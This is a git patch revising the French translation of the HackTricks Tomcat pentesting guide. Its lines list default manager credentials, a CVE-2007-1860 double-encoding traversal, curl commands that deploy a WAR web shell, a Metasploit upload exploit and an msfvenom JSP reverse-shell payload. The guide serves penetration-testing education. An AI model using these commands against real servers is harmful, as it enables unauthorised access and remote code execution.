From bf588aabdfc386613baef090362cdd6cb1329703 Mon Sep 17 00:00:00 2001 From: Translator Date: Thu, 11 Apr 2024 00:57:27 +0000 Subject: [PATCH] Translated ['network-services-pentesting/pentesting-web/tomcat/README.md --- .../pentesting-web/tomcat/README.md | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/network-services-pentesting/pentesting-web/tomcat/README.md b/network-services-pentesting/pentesting-web/tomcat/README.md index a09bdd14e..7b8bffc9c 100644 --- a/network-services-pentesting/pentesting-web/tomcat/README.md +++ b/network-services-pentesting/pentesting-web/tomcat/README.md @@ -2,13 +2,13 @@
-Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS de HackTricks)! +Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)! * Travaillez-vous dans une **entreprise de cybersécurité**? Vous voulez voir votre **entreprise annoncée dans HackTricks**? ou voulez-vous avoir accès à la **dernière version du PEASS ou télécharger HackTricks en PDF**? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)! * Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) * Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) * **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** -* **Partagez vos astuces de piratage en soumettant des PRs au** [**dépôt hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**dépôt hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud). +* **Partagez vos astuces de piratage en soumettant des PR aux** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
@@ -45,9 +45,9 @@ Pour les versions de Tomcat antérieures à 6, il est possible d'énumérer les ```bash msf> use auxiliary/scanner/http/tomcat_enum ``` -### **Identifiants par défaut** +### **Informations d'identification par défaut** -Le répertoire **`/manager/html`** est particulièrement sensible car il permet le téléchargement et le déploiement de fichiers WAR, ce qui peut entraîner l'exécution de code. Ce répertoire est protégé par une authentification HTTP de base, avec des identifiants courants tels que : +Le répertoire **`/manager/html`** est particulièrement sensible car il permet le téléchargement et le déploiement de fichiers WAR, ce qui peut entraîner l'exécution de code. Ce répertoire est protégé par une authentification HTTP de base, avec des informations d'identification courantes telles que : * admin:admin * tomcat:tomcat @@ -56,7 +56,7 @@ Le répertoire **`/manager/html`** est particulièrement sensible car il permet * tomcat:s3cr3t * admin:tomcat -Ces identifiants peuvent être testés en utilisant : +Ces informations d'identification peuvent être testées en utilisant : ```bash msf> use auxiliary/scanner/http/tomcat_mgr_login ``` @@ -74,13 +74,13 @@ En plus de définir divers paramètres dans Metasploit pour cibler un hôte spé ### **Divulgation de Trace de Mot de Passe** -L'accès à `/auth.jsp` peut révéler le mot de passe dans une trace sous des circonstances favorables. +Accéder à `/auth.jsp` peut révéler le mot de passe dans une trace sous des circonstances favorables. ### **Encodage d'URL Double** La vulnérabilité CVE-2007-1860 dans `mod_jk` permet un double encodage d'URL pour la traversée de chemin, permettant un accès non autorisé à l'interface de gestion via une URL spécialement conçue. -Pour accéder à l'interface de gestion de Tomcat, allez à : `cheminTomcat/%252E%252E/manager/html` +Pour accéder à l'interface web de gestion de Tomcat, allez à : `cheminTomcat/%252E%252E/manager/html` ### /examples @@ -123,7 +123,7 @@ Enfin, si vous avez accès au Gestionnaire d'Application Web Tomcat, vous pouvez ### Limitations -Vous ne pourrez déployer un WAR que si vous avez **suffisamment de privilèges** (rôles : **admin**, **manager** et **manager-script**). Ces détails peuvent être trouvés dans _tomcat-users.xml_ généralement défini dans `/usr/share/tomcat9/etc/tomcat-users.xml` (cela varie selon les versions) (voir [POST](./#post) section). +Vous ne pourrez déployer un WAR que si vous avez **suffisamment de privilèges** (rôles : **admin**, **manager** et **manager-script**). Ces détails peuvent être trouvés dans _tomcat-users.xml_ généralement défini dans `/usr/share/tomcat9/etc/tomcat-users.xml` (cela varie selon les versions) (voir [POST](./#post)section). ```bash # tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed @@ -134,6 +134,8 @@ curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/mana curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell" ``` ### Metasploit + +Metasploit est un outil très puissant et polyvalent pour l'exploitation de vulnérabilités dans les systèmes informatiques. Il est largement utilisé par les professionnels de la sécurité pour tester la sécurité des réseaux et des applications. Metasploit offre une grande variété de modules d'exploitation qui peuvent être utilisés pour cibler divers services et applications, y compris Apache Tomcat. ```bash use exploit/multi/http/tomcat_mgr_upload msf exploit(multi/http/tomcat_mgr_upload) > set rhost @@ -146,11 +148,9 @@ msf exploit(multi/http/tomcat_mgr_upload) > exploit 1. Créez le fichier war à déployer : ```bash -msfvenom -p java/shell_reverse_tcp LHOST= LPORT= -f war -o revshell.war +msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war -o revshell.war ``` -### Téléchargez le fichier `revshell.war` et accédez-y (`/revshell/`): - -### Coquille de liaison et de reverse avec [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer) +### Liens et coquilles avec [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer) Dans certains scénarios, cela ne fonctionne pas (par exemple, les anciennes versions de sun)